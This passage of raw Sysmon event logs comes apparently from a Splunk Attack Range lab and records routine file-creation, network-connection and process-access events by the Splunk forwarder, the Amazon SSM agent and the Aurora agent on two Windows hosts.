Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37A11E2C89F5B0CE5719F76BB71E91E0,SHA256=48BD3C116E266D23775BD7ADD4DAB59C97927B6073AC64C17E2395B44AFD8CC3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000046235Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:16.682{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56458-false10.0.1.12-8000- 23542300x800000000000000046234Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:18.230{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B9171F9471605DE10241A0D788BB8B9,SHA256=1CFE1C879DA9D3743A57F9D77DDA4E71B61A0AC7F873E83B526D6B46446CCADC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018458Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:17.052{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50182-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000018463Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:19.800{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D220FC95BA49D04A1C436299542D93F,SHA256=581E93ECA76D8C41F406EB8E20841E2D4B9DD2BF36DF0E81E4F239EA28C5292F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018462Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:19.800{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018461Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:19.800{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018460Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:19.800{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000046236Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:19.332{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05A534EB9E74F73842B74D024BC66A2A,SHA256=3702BE3CB155A52E23685AC3907FB09BF15A0DFB86F06BF9C5DC76A050B85E78,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018465Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:20.885{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40CC7ECD9419EADEE9DEE0EE650C61E1,SHA256=1D8288673245C4819C158B389FC697F14205525C0EF00713A9C5C00F77BEC9C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046237Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:20.407{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E28415C4FEB0E151751806047146541,SHA256=41BDC97DCD0139A6402EFD9BD7F970E0A04654E1FB3FC1B3A846E514654A5213,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018464Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:20.141{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\respondent-20230118114719-040MD5=2BA10D7196373860DD67B47CDBC7ACF2,SHA256=36B87809E8BE9B960CE5E03B4CEC64D52EF7C46D9877F9C3402AB54869FC5CBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018467Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:21.957{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B158EDD3860EF36DDD2E59CD829A6EA9,SHA256=491D749459D9405D9C853FE74E12D4BCD518C89BC8614AB160F6CCA7AC3FE4CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046238Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:21.501{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=438A0212A8F2DA5C99AF307ED3DC62CC,SHA256=5039F87A442367E7D4A0D66CC81D0937F0D94E9DFCB2C953E6761E61409591AE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018466Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:21.148{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\surveyor-20230118114717-041MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046239Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:22.590{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=910E6B934B2150F7E937FCA03ED1B879,SHA256=9341E4015793D91ABB09877E9692F19FBCFCCE7BED06A8CAFFA91CAD00C3BE74,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018498Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.778{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018497Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.772{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018496Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.771{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018495Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.768{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018494Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.765{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018493Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.763{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018492Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.762{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018491Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.759{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018490Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.758{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018489Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.755{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018488Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.751{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018487Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.745{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018486Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.741{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018485Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.738{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018484Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.727{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018483Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.723{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018482Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.714{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018481Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.711{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018480Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.692{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 10341000x800000000000000018479Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:22.685{E5A8D418-DC44-63C7-1C00-00000000B002}20203040C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013280190) 